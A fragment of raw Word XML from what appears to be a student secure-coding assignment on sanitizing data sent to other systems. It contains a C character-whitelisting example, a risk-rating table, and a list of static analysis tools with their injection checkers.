              <w:t>; /* Cursor into string */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A5E45D9" w14:textId="77777777" w:rsidR="00612C9D" w:rsidRDefault="00612C9D" w:rsidP="00612C9D">
            <w:r>
              <w:t xml:space="preserve">const char *end = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>user_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>strlen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">( </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>user</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DAA7178" w14:textId="77777777" w:rsidR="00612C9D" w:rsidRDefault="00612C9D" w:rsidP="00612C9D">
            <w:r>
              <w:t xml:space="preserve">for (cp += </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>strspn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">cp, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ok_chars</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">); cp != end; cp += </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>strspn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">(cp, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ok_chars</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ECFE80E" w14:textId="77777777" w:rsidR="00612C9D" w:rsidRDefault="00612C9D" w:rsidP="00612C9D">
            <w:r>
              <w:t xml:space="preserve">  *cp = '_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>';</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4E978D2E" w14:textId="2906244C" w:rsidR="00F72634" w:rsidRDefault="00612C9D" w:rsidP="00612C9D">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28F220E8" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00B475A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE535A7" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Int_HdfGCVQo"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Note: Stop here for the milestone. Complete this section for Project One in Module Six.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>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AF59995" w14:textId="77777777" w:rsidR="0080428C" w:rsidRDefault="00B475A1" w:rsidP="00F879A3">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r w:rsidR="001B26B8">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B41BD7" w:rsidRPr="00F879A3">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>1. Validate</w:t>
            </w:r>
            <w:r w:rsidR="00B41BD7">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t xml:space="preserve"> Input Data</w:t>
            </w:r>
            <w:r w:rsidR="00B41BD7">
              <w:t>: Sanitizing data is a critical aspect of input validation. It ensures that data passed to complex subsystems does not contain harmful characters or commands that could exploit vulnerabilities, such as SQL injection.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53482B8C" w14:textId="31EF0DEA" w:rsidR="00B475A1" w:rsidRDefault="001B26B8" w:rsidP="00F879A3">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>7.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                </w:rPr>
                <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6MTk5MzIyMzMwOA=="/>
                <w:id w:val="357638929"/>
                <w:placeholder>
                  <w:docPart w:val="33695E46DF0749BF8B81492F2F1B41FE"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidR="00ED3F35" w:rsidRPr="00ED3F35">
                  <w:rPr>
                    <w:b/>
                    <w:bCs/>
                    <w:color w:val="000000" w:themeColor="text1"/>
                  </w:rPr>
                  <w:t>Sanitize Data Sent to Other Systems:</w:t>
                </w:r>
                <w:r w:rsidR="00782E40">
                  <w:rPr>
                    <w:b/>
                    <w:bCs/>
                    <w:color w:val="000000" w:themeColor="text1"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> </w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidR="006B5DAA">
              <w:t xml:space="preserve"> This principle directly aligns with the guideline to sanitize string data before passing it to complex subsystems. It emphasizes the critical importance of filtering out malicious input that could exploit vulnerabilities in external systems, such as SQL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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24424F31" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1EE4C58C" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="497B4EEC" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A8F7D04" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="5FAB2FBC" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78F3D274" w14:textId="13FF5F89" w:rsidR="00B475A1" w:rsidRDefault="00605446" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CDD9AA9" w14:textId="74313284" w:rsidR="00B475A1" w:rsidRDefault="00605446" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C831C3D" w14:textId="7DA05682" w:rsidR="00B475A1" w:rsidRDefault="00605446" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CDF17A4" w14:textId="7BDEA959" w:rsidR="00B475A1" w:rsidRDefault="00A34C04" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="459AD35B" w14:textId="1873B7A3" w:rsidR="00B475A1" w:rsidRDefault="00A34C0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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D8313C6" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="189A6428" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7601021C" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0D58" w14:paraId="4AE2E526" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D423C47" w14:textId="3E5CB891" w:rsidR="006C0D58" w:rsidRDefault="00000000" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId64" w:history="1">
              <w:r w:rsidR="006C0D58">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Astrée</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="510F5ED6" w14:textId="4A895E6B" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>24.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55B618EC" w14:textId="12F813F4" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45E70620" w14:textId="040DCD60" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Supported by stubbing/taint analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0D58" w14:paraId="631335FB" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D7DAF61" w14:textId="4C52D6A2" w:rsidR="006C0D58" w:rsidRDefault="00000000" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId65" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="006C0D58">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CodeSonar</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59BE0E81" w14:textId="39D65930" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>8.1p0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B3F44DA" w14:textId="7B16748E" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IO.INJ.COMMAND</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w: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IO.INJ.LDAP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IO.INJ.LIB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IO.INJ.SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IO.UT.LIB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IO.UT.PROC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75413ECD" w14:textId="52CCA65A" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Command injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Format string injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>LDAP injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Library injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>SQL injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Untrusted Library Load</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Untrusted Process Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0D58" w14:paraId="53A16CAB" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="730AD398" w14:textId="5011C92C" w:rsidR="006C0D58" w:rsidRDefault="00000000" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId66" w:history="1">
              <w:r w:rsidR="006C0D58">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Coverity</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01646044" w14:textId="4CEAD0F7" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02CDAF81" w14:textId="567383C0" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>TAINTED_STRING</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27D28E14" w14:textId="0B173E1C" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Fully implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0D58" w14:paraId="0D602FB6" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6848F189" w14:textId="15B675EA" w:rsidR="006C0D58" w:rsidRDefault="00000000" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId67" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="006C0D58">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Klocwork</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5166FE7E" w14:textId="13D65F43" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="773E0CEC" w14:textId="22114B3C" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
